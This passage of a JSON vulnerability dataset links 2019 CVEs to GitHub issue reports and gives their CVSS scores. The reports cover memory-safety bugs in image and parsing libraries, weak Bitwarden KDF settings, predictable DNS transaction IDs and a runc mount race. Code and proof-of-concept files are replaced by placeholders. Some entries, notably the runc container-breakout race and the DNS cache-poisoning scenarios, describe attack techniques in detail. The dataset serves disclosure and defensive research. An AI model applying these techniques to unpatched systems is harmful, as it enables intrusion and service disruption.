  41029. },
  41030. {
  41031. "CVE_ID": "CVE-2019-19729",
  41032. "Issue_Url_old": "https://github.com/williamkapke/bson-objectid/issues/30",
  41033. "Issue_Url_new": "https://github.com/cabinjs/bson-objectid/issues/30",
  41034. "Repo_new": "cabinjs/bson-objectid",
  41035. "Issue_Created_At": "2019-12-07T21:03:35Z",
  41036. "description": "A vulnerability in APITAG We found that APITAG allows an attacker to generate a malformed objectid by inserting an additional property to his user input. Since objectid might be inserted into APITAG this might cause security issues like SQL injection. The vulnerable code is as follows: bson objectid will return early if it detects _bsontype == APITAG in user input object. As a result, objects in arbitrary forms can bypass formatting if they have a valid bsontype. URLTAG In fact, the official implementation (shown in the following code) enforces a stricter early return condition, i.e., only if the constructor of the user input object is APITAG URLTAG Reproduce script CODETAG",
  41037. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  41038. "severity": "HIGH",
  41039. "baseScore": 7.5,
  41040. "impactScore": 3.6,
  41041. "exploitabilityScore": 3.9
  41042. },
  41043. {
  41044. "CVE_ID": "CVE-2019-19766",
  41045. "Issue_Url_old": "https://github.com/bitwarden/jslib/issues/52",
  41046. "Issue_Url_new": "https://github.com/bitwarden/jslib/issues/52",
  41047. "Repo_new": "bitwarden/jslib",
  41048. "Issue_Created_At": "2019-10-31T14:31:41Z",
  41049. "description": "SHA NUMBERTAG is a terrible choice for a PBKDF in NUMBERTAG FILETAG It looks like the only supported choice for a PBKDF is SHA NUMBERTAG This is possibly the worst choice available for a password based KDF, as a PBKDF should be relatively slow, and SHA NUMBERTAG is perhaps practically the fastest hash function on earth due to optimizations made for Bitcoin (e.g. cheap ASICs and suchlike). Even iterated, it's way too fast, and only getting faster. I was evaluating Bitwarden as a potential replacement for Dashlane APITAG sucks) but this is a real non starter for me. Please up your KDF game. It's NUMBERTAG Additional reading: URLTAG URLTAG TL;DR: Use Argon2. URLTAG",
  41050. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  41051. "severity": "HIGH",
  41052. "baseScore": 7.5,
  41053. "impactScore": 3.6,
  41054. "exploitabilityScore": 3.9
  41055. },
  41056. {
  41057. "CVE_ID": "CVE-2019-19766",
  41058. "Issue_Url_old": "https://github.com/bitwarden/server/issues/589",
  41059. "Issue_Url_new": "https://github.com/bitwarden/server/issues/589",
  41060. "Repo_new": "bitwarden/server",
  41061. "Issue_Created_At": "2019-11-01T13:55:38Z",
  41062. "description": "Security Issue: KDF max iterations is too low. URLTAG URLTAG",
  41063. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  41064. "severity": "HIGH",
  41065. "baseScore": 7.5,
  41066. "impactScore": 3.6,
  41067. "exploitabilityScore": 3.9
  41068. },
  41069. {
  41070. "CVE_ID": "CVE-2019-19777",
  41071. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/109",
  41072. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/109",
  41073. "Repo_new": "saitoha/libsixel",
  41074. "Issue_Created_At": "2019-12-12T14:03:22Z",
  41075. "description": "heap buffer overflow in stbi__load_main at APITAG version : img2sixel NUMBERTAG There is a heap buffer overflow in stbi__load_main at APITAG please run following cmd to reproduce it. APITAG poc URLTAG ASAN LOG ERRORTAG",
  41076. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41077. "severity": "HIGH",
  41078. "baseScore": 8.8,
  41079. "impactScore": 5.9,
  41080. "exploitabilityScore": 2.8
  41081. },
  41082. {
  41083. "CVE_ID": "CVE-2019-19778",
  41084. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/110",
  41085. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/110",
  41086. "Repo_new": "saitoha/libsixel",
  41087. "Issue_Created_At": "2019-12-12T15:11:41Z",
  41088. "description": "heap buffer overflow in load_sixel at APITAG version : img2sixel NUMBERTAG There is a heap buffer overflow in load_sixel at APITAG please run following cmd to reproduce it. APITAG poc URLTAG ASAN LOG ERRORTAG",
  41089. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41090. "severity": "HIGH",
  41091. "baseScore": 8.8,
  41092. "impactScore": 5.9,
  41093. "exploitabilityScore": 2.8
  41094. },
  41095. {
  41096. "CVE_ID": "CVE-2019-19794",
  41097. "Issue_Url_old": "https://github.com/miekg/dns/issues/1043",
  41098. "Issue_Url_new": "https://github.com/miekg/dns/issues/1043",
  41099. "Repo_new": "miekg/dns",
  41100. "Issue_Created_At": "2019-12-05T19:08:46Z",
  41101. "description": "[security] Predictable TXID can lead to response forgeries. The default Id function uses math/rand, meaning the outputs are predictable, and an attacker might be able to use this to forge responses without being on path. Seeding math/rand from crypto/rand is pointless, as the math/rand algorithm is invertible: given a sequence of outputs it's possible to reconstruct the Rand state and predict all future outputs. Exploitation might be a little slower because the outputs are just NUMBERTAG bits, but it's likely to be possible. Unless NUMBERTAG or DNSSEC are used, response verification relies only on source port and TXID. They are both short, but the combination usually makes it hard for an off path attacker to win the race against the real answer. Without the TXID, the attacker has a very good chance of success at a Kaminsky Attack. A couple example scenarios: A DNS cache \u2014 the attacker makes a sequence of requests to get enough TXIDs to reverse the internal state of the RNG, then it causes a request to be issued by the cache to an upstream server, and knowing the TXID sends a spoofed answer to every port, poisoning the cache. A prober with an API, like say Let's Encrypt \u2014 the attacker causes a number of requests to its own domain to observe TXIDs, then causes a lookup for a target domain, and spoofs the response. Since the performance cost seems negligible NUMBERTAG I recommend doing the secure thing by default and just reading the NUMBERTAG bytes from crypto/rand. If there are performance problems, just using a APITAG should solve them, as most of the cost of crypto/rand is syscall overhead. Filing publicly as asked by APITAG",
  41102. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  41103. "severity": "MEDIUM",
  41104. "baseScore": 5.9,
  41105. "impactScore": 3.6,
  41106. "exploitabilityScore": 2.2
  41107. },
  41108. {
  41109. "CVE_ID": "CVE-2019-19794",
  41110. "Issue_Url_old": "https://github.com/coredns/coredns/issues/3519",
  41111. "Issue_Url_new": "https://github.com/coredns/coredns/issues/3519",
  41112. "Repo_new": "coredns/coredns",
  41113. "Issue_Created_At": "2019-12-08T16:31:44Z",
  41114. "description": "APITAG NUMBERTAG Release Tracking. This issue is to keep track of NUMBERTAG release. Specifically we want to update the URLTAG that carries URLTAG /cc MENTIONTAG",
  41115. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  41116. "severity": "MEDIUM",
  41117. "baseScore": 5.9,
  41118. "impactScore": 3.6,
  41119. "exploitabilityScore": 2.2
  41120. },
  41121. {
  41122. "CVE_ID": "CVE-2019-19794",
  41123. "Issue_Url_old": "https://github.com/coredns/coredns/issues/3547",
  41124. "Issue_Url_new": "https://github.com/coredns/coredns/issues/3547",
  41125. "Repo_new": "coredns/coredns",
  41126. "Issue_Created_At": "2019-12-16T21:18:11Z",
  41127. "description": "APITAG CVETAG . This is a public announcement of a security vulnerability discovered in earlier versions of APITAG before NUMBERTAG URLTAG As was mentioned in CVETAG , one of the upstream library miekg/dns used Golang's APITAG . This causes predictable TXID and may allow cache poisoning APITAG URLTAG for details). APITAG was impacted by this upstream vulnerability. The latest release of APITAG NUMBERTAG fixes this issue. We encourage all APITAG users to update to NUMBERTAG as soon as possible. The issue was discovered by MENTIONTAG we very much appreciate his contributions! \ud83d\udc4d This issue will keep open for a couple of weeks or so, so that it is visible to public.",
  41128. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  41129. "severity": "MEDIUM",
  41130. "baseScore": 5.9,
  41131. "impactScore": 3.6,
  41132. "exploitabilityScore": 2.2
  41133. },
  41134. {
  41135. "CVE_ID": "CVE-2019-19794",
  41136. "Issue_Url_old": "https://github.com/miekg/dns/issues/1037",
  41137. "Issue_Url_new": "https://github.com/miekg/dns/issues/1037",
  41138. "Repo_new": "miekg/dns",
  41139. "Issue_Created_At": "2019-11-15T00:55:26Z",
  41140. "description": "Revisit randomness decision based on new performance data. In NUMBERTAG and NUMBERTAG some benchmarking data was provided showing that APITAG is faster than APITAG . However, those tests took too narrow a view. It's important to look at id generation in the actual context in which it's used. FILETAG that stands up a trivial DNS server, and sends a lot of queries at it. You can fiddle with values of parallel to try and max out local CPU. On my laptop, APITAG came close to maxing out my CPUs, and I was able to get an average qps of NUMBERTAG for crypto/rand vs NUMBERTAG for math/rand. This is a pretty tiny difference, and that's in optimal conditions. Across a real network, the qps would be much lower, which means the impact of using crypto/rand would be much lower. I'd like to propose making APITAG the default, so users don't have to worry about whether they need more secure ID generation. CODETAG",
  41141. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  41142. "severity": "MEDIUM",
  41143. "baseScore": 5.9,
  41144. "impactScore": 3.6,
  41145. "exploitabilityScore": 2.2
  41146. },
  41147. {
  41148. "CVE_ID": "CVE-2019-19795",
  41149. "Issue_Url_old": "https://github.com/michaelforney/samurai/issues/29",
  41150. "Issue_Url_new": "https://github.com/michaelforney/samurai/issues/29",
  41151. "Repo_new": "michaelforney/samurai",
  41152. "Issue_Created_At": "2019-12-13T18:05:45Z",
  41153. "description": "Heap based buffer overflow in the APITAG function. Hi, While fuzzing samurai NUMBERTAG with American Fuzzy Lop, I found a heap based buffer overflow in the APITAG function, in util.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  41154. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41155. "severity": "HIGH",
  41156. "baseScore": 7.8,
  41157. "impactScore": 5.9,
  41158. "exploitabilityScore": 1.8
  41159. },
  41160. {
  41161. "CVE_ID": "CVE-2019-19796",
  41162. "Issue_Url_old": "https://github.com/marcIhm/yabasic/issues/37",
  41163. "Issue_Url_new": "https://github.com/marcihm/yabasic/issues/37",
  41164. "Repo_new": "marcihm/yabasic",
  41165. "Issue_Created_At": "2019-12-13T19:41:08Z",
  41166. "description": "Heap based buffer overflow in the APITAG function. Hi, While fuzzing yabasic NUMBERTAG with Honggfuzz, I found a heap based buffer overflow in the APITAG function, in function.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  41167. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41168. "severity": "HIGH",
  41169. "baseScore": 7.8,
  41170. "impactScore": 5.9,
  41171. "exploitabilityScore": 1.8
  41172. },
  41173. {
  41174. "CVE_ID": "CVE-2019-19847",
  41175. "Issue_Url_old": "https://github.com/fontforge/libspiro/issues/21",
  41176. "Issue_Url_new": "https://github.com/fontforge/libspiro/issues/21",
  41177. "Repo_new": "fontforge/libspiro",
  41178. "Issue_Created_At": "2019-12-17T10:19:54Z",
  41179. "description": "Stack based buffer overflow in the APITAG function. Hi, When building libspiro NUMBERTAG with APITAG enabled and running the test suite, I found a stack based buffer overflow in APITAG in spiro.c. In the test suite, APITAG to APITAG all trigger the same issue. The issue can be triggered as follow: APITAG ERRORTAG",
  41180. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  41181. "severity": "HIGH",
  41182. "baseScore": 8.1,
  41183. "impactScore": 5.9,
  41184. "exploitabilityScore": 2.2
  41185. },
  41186. {
  41187. "CVE_ID": "CVE-2019-19887",
  41188. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/14",
  41189. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/14",
  41190. "Repo_new": "rockcarry/ffjpeg",
  41191. "Issue_Created_At": "2019-12-17T15:58:08Z",
  41192. "description": "APITAG in jfif_encode at APITAG run APITAG in linux result in gdb. APITAG steam is a pointer which is null in this case. Dereferencing null pointer cause segment fault. fix: CODETAG FILETAG",
  41193. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41194. "severity": "MEDIUM",
  41195. "baseScore": 6.5,
  41196. "impactScore": 3.6,
  41197. "exploitabilityScore": 2.8
  41198. },
  41199. {
  41200. "CVE_ID": "CVE-2019-19888",
  41201. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/13",
  41202. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/13",
  41203. "Repo_new": "rockcarry/ffjpeg",
  41204. "Issue_Created_At": "2019-12-17T06:48:47Z",
  41205. "description": "Deny of Service caused by dividing zero without sanity check in jfif.c. file: jfif.c function: jfif_decode line NUMBERTAG mcuw = sfh_ma NUMBERTAG mcuh = sfv_ma NUMBERTAG jw = ALIGN(jfif >width , mcuw); jh = ALIGN(jfif >height, mcuh); mcuc = jw / mcuw; < mcuw can be zero mcur = jh / mcuh; // calculate mcu info",
  41206. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41207. "severity": "MEDIUM",
  41208. "baseScore": 6.5,
  41209. "impactScore": 3.6,
  41210. "exploitabilityScore": 2.8
  41211. },
  41212. {
  41213. "CVE_ID": "CVE-2019-19899",
  41214. "Issue_Url_old": "https://github.com/PebbleTemplates/pebble/issues/493",
  41215. "Issue_Url_new": "https://github.com/pebbletemplates/pebble/issues/493",
  41216. "Repo_new": "pebbletemplates/pebble",
  41217. "Issue_Created_At": "2019-12-18T21:59:56Z",
  41218. "description": "Unsafe Methods Bypass. I was reading about URLTAG and found a bypass to the fix in NUMBERTAG URLTAG . The following code will throw a security exception after the fix in NUMBERTAG APITAG However you can still access APITAG via the APITAG signature: ERRORTAG",
  41219. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  41220. "severity": "CRITICAL",
  41221. "baseScore": 9.8,
  41222. "impactScore": 5.9,
  41223. "exploitabilityScore": 3.9
  41224. },
  41225. {
  41226. "CVE_ID": "CVE-2019-19906",
  41227. "Issue_Url_old": "https://github.com/cyrusimap/cyrus-sasl/issues/587",
  41228. "Issue_Url_new": "https://github.com/cyrusimap/cyrus-sasl/issues/587",
  41229. "Repo_new": "cyrusimap/cyrus-sasl",
  41230. "Issue_Created_At": "2019-11-28T15:38:04Z",
  41231. "description": "Off by one in _sasl_add_string function. Dear Cyrus SASL team \u2014 During tests against openldap NUMBERTAG I have detected an off by one error in _sasl_add_string function. In case of openldap this bug can cause a denial of service condition or has other unspecified impact. Valgrind output from openldap ERRORTAG Patch CODETAG Please let me know what additional information I can provide to fix the issue. Stephan Zeisberg",
  41232. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  41233. "severity": "HIGH",
  41234. "baseScore": 7.5,
  41235. "impactScore": 3.6,
  41236. "exploitabilityScore": 3.9
  41237. },
  41238. {
  41239. "CVE_ID": "CVE-2019-19909",
  41240. "Issue_Url_old": "https://github.com/pkp/pkp-lib/issues/5302",
  41241. "Issue_Url_new": "https://github.com/pkp/pkp-lib/issues/5302",
  41242. "Repo_new": "pkp/pkp-lib",
  41243. "Issue_Created_At": "2019-11-26T20:40:21Z",
  41244. "description": "Use json_encode/json_decode instead of serialize/unserialize in report generator. JSON is limited to simple constructs like arrays, strings, and numbers. serialize / ERRORTAG can be used to describe more complex objects, which may not be trustworthy. Use APITAG / APITAG instead of serialize / ERRORTAG in the report generator. Review elsewhere for similar usage.",
  41245. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41246. "severity": "HIGH",
  41247. "baseScore": 8.8,
  41248. "impactScore": 5.9,
  41249. "exploitabilityScore": 2.8
  41250. },
  41251. {
  41252. "CVE_ID": "CVE-2019-19921",
  41253. "Issue_Url_old": "https://github.com/opencontainers/runc/issues/2197",
  41254. "Issue_Url_new": "https://github.com/opencontainers/runc/issues/2197",
  41255. "Repo_new": "opencontainers/runc",
  41256. "Issue_Created_At": "2020-01-01T13:07:23Z",
  41257. "description": "[ CVETAG ]: Volume mount race condition with shared mounts. Disclosed in URLTAG Here's the original report to APITAG Hi all, an attacker who controls the container image for two containers that share a volume can race volume mounts during container initialization, by adding a symlink to the rootfs that points to a directory on the volume. The second container won't be able to see the actual mount, but it can race it by modifying the mount point on the volume. This can be exploited for a full container breakout by racing readonly/mask mounts, allowing writes to dangerous paths like APITAG . Example: The rootfs of container A has a symlink APITAG > APITAG Container A specifies a named volume mounted to APITAG Container B, started before container A, shares this named volume and repeatedly swaps APITAG and APITAG Container A mounts procfs to APITAG , but when it remounts APITAG , it does so at APITAG . This can reliably be reproduced using runc and podman on Fedora NUMBERTAG takes about NUMBERTAG s to win the race for me): URLTAG APITAG would ordinarily prevent the exploit by disallowing APITAG from writing APITAG , but it can be disabled by symlinking APITAG to something benign like APITAG (bypassing the procfs check). APITAG can be disabled similarly. Docker specifies the mounts in a different order and mounts procfs after it mounts the volumes, mounting over the /proc symlink, which appears to prevent at least the /proc approach. I haven't tested other runc usage scenarios, for instance, k8s+cri o might be vulnerable as well. Fabian of Cure NUMBERTAG in CC) created a minimal APITAG that uses runc directly: URLTAG There are other container init steps after the volume mount that can be raced, obvious ones being APITAG and the APITAG attrs but there might be others, especially in APITAG (like tricking remount into mounting the rootfs as rshared if there's another volume that specifies the flag, but I haven't tried that). This is similar to the vulnerability I reported that Adam Iwaniuk disclosed during their Dragon Sector CTF ( URLTAG and a similar crun one ( URLTAG The fix for the mounts is probably what Aleksa outlined here, using PATHTAG to resolve the path: URLTAG",
  41258. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  41259. "severity": "HIGH",
  41260. "baseScore": 7.0,
  41261. "impactScore": 5.9,
  41262. "exploitabilityScore": 1.0
  41263. },
  41264. {
  41265. "CVE_ID": "CVE-2019-19922",
  41266. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/67577",
  41267. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/67577",
  41268. "Repo_new": "kubernetes/kubernetes",
  41269. "Issue_Created_At": "2018-08-20T04:06:20Z",
  41270. "description": "CFS quotas can lead to unnecessary throttling. > /kind bug This is not a bug in Kubernets per se, it's more of a heads up. I've read this great blog post: URLTAG From the blog post I learned that k8s is using cfs quotas to enforce CPU limits. Unfortunately, those can lead to unnecessary throttling, especially for well behaved tenants. See this unresolved bug in Linux kernel I filed a while back: CVETAG There's an open and stalled patch that addresses the issue (I've not verified if it works): URLTAG cc MENTIONTAG APITAG",
  41271. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  41272. "severity": "MEDIUM",
  41273. "baseScore": 5.5,
  41274. "impactScore": 3.6,
  41275. "exploitabilityScore": 1.8
  41276. },
  41277. {
  41278. "CVE_ID": "CVE-2019-19930",
  41279. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/193",
  41280. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/193",
  41281. "Repo_new": "mz-automation/libiec61850",
  41282. "Issue_Created_At": "2019-12-20T13:37:27Z",
  41283. "description": "Deny of Service, caused by integer overflow in function APITAG PATHTAG Function APITAG didn't check argument APITAG if it's negative. If it is a negative number, then argument which malloc will use later is a huge number. For example NUMBERTAG would be interpreted as NUMBERTAG ffffffff on NUMBERTAG bit arch or NUMBERTAG ffffffffffffffff on NUMBERTAG bit arch. APITAG poc: FILETAG steps to reproduce NUMBERTAG compile libiec NUMBERTAG with compiler flag APITAG NUMBERTAG compile test.c in FILETAG NUMBERTAG run: APITAG in gdb result in gdb ERRORTAG",
  41284. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41285. "severity": "MEDIUM",
  41286. "baseScore": 6.5,
  41287. "impactScore": 3.6,
  41288. "exploitabilityScore": 2.8
  41289. },
  41290. {
  41291. "CVE_ID": "CVE-2019-19931",
  41292. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/194",
  41293. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/194",
  41294. "Repo_new": "mz-automation/libiec61850",
  41295. "Issue_Created_At": "2019-12-20T13:55:52Z",
  41296. "description": "Heap overflow in function APITAG PATHTAG Function APITAG has heap overflow vulnerability in file PATHTAG APITAG poc: FILETAG steps to reproduce NUMBERTAG compile libiec NUMBERTAG with compiler flag APITAG NUMBERTAG compile test.c in FILETAG NUMBERTAG run: APITAG in gdb result in gdb ERRORTAG",
  41297. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41298. "severity": "HIGH",
  41299. "baseScore": 8.8,
  41300. "impactScore": 5.9,
  41301. "exploitabilityScore": 2.8
  41302. },
  41303. {
  41304. "CVE_ID": "CVE-2019-19944",
  41305. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/196",
  41306. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/196",
  41307. "Repo_new": "mz-automation/libiec61850",
  41308. "Issue_Created_At": "2019-12-23T07:20:53Z",
  41309. "description": "Deny of service caused in function APITAG in PATHTAG APITAG in PATHTAG doesn't check passed arguments. APITAG and APITAG can be large number, so following memory access APITAG would segment fault. APITAG poc: FILETAG gdb stack backtrace: CODETAG",
  41310. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41311. "severity": "MEDIUM",
  41312. "baseScore": 6.5,
  41313. "impactScore": 3.6,
  41314. "exploitabilityScore": 2.8
  41315. },
  41316. {
  41317. "CVE_ID": "CVE-2019-19948",
  41318. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1562",
  41319. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1562",
  41320. "Repo_new": "imagemagick/imagemagick",
  41321. "Issue_Created_At": "2019-04-29T03:08:25Z",
  41322. "description": "heap buffer overflow in APITAG of coders/sgi.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow vulnerability in function APITAG of coders/sgi.c. Steps to Reproduce APITAG NUMBERTAG fee NUMBERTAG cf NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] APITAG NUMBERTAG fee NUMBERTAG cf NUMBERTAG APITAG NUMBERTAG fee NUMBERTAG cf NUMBERTAG APITAG NUMBERTAG fee NUMBERTAG cf NUMBERTAG APITAG NUMBERTAG fee NUMBERTAG cf NUMBERTAG APITAG NUMBERTAG fee NUMBERTAG cf NUMBERTAG APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING APITAG Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG APITAG Copyright NUMBERTAG APITAG Studio LLC APITAG License: FILETAG APITAG Features: Cipher DPC HDRI APITAG APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib APITAG Distributor ID: Ubuntu APITAG Description: Ubuntu NUMBERTAG LTS APITAG Release NUMBERTAG APITAG Codename: xenial` Additional information: APITAG",
  41323. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  41324. "severity": "CRITICAL",
  41325. "baseScore": 9.8,
  41326. "impactScore": 5.9,
  41327. "exploitabilityScore": 3.9
  41328. },
  41329. {
  41330. "CVE_ID": "CVE-2019-19949",
  41331. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1561",
  41332. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1561",
  41333. "Repo_new": "imagemagick/imagemagick",
  41334. "Issue_Created_At": "2019-04-29T02:55:44Z",
  41335. "description": "heap buffer overflow in APITAG of png.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow vulnerability in function APITAG of png.c. Steps to Reproduce APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING APITAG Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG APITAG Copyright NUMBERTAG APITAG Studio LLC APITAG License: FILETAG APITAG Features: Cipher DPC HDRI APITAG APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib APITAG Distributor ID: Ubuntu APITAG Description: Ubuntu NUMBERTAG LTS APITAG Release NUMBERTAG APITAG Codename: xenial` Additional information: APITAG",
  41336. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  41337. "severity": "CRITICAL",
  41338. "baseScore": 9.1,
  41339. "impactScore": 5.2,
  41340. "exploitabilityScore": 3.9
  41341. },
  41342. {
  41343. "CVE_ID": "CVE-2019-19952",
  41344. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1791",
  41345. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1791",
  41346. "Repo_new": "imagemagick/imagemagick",
  41347. "Issue_Created_At": "2019-11-27T06:48:11Z",
  41348. "description": "heap use after free in APITAG of coders/png.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap use after free vulnerability in function APITAG of coders/png.c whick can be reproduced as below. Steps to Reproduce APITAG NUMBERTAG e NUMBERTAG fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd APITAG NUMBERTAG e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd APITAG NUMBERTAG e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd APITAG NUMBERTAG e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd APITAG NUMBERTAG e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd APITAG NUMBERTAG e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Additional information: APITAG",
  41349. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  41350. "severity": "CRITICAL",
  41351. "baseScore": 9.8,
  41352. "impactScore": 5.9,
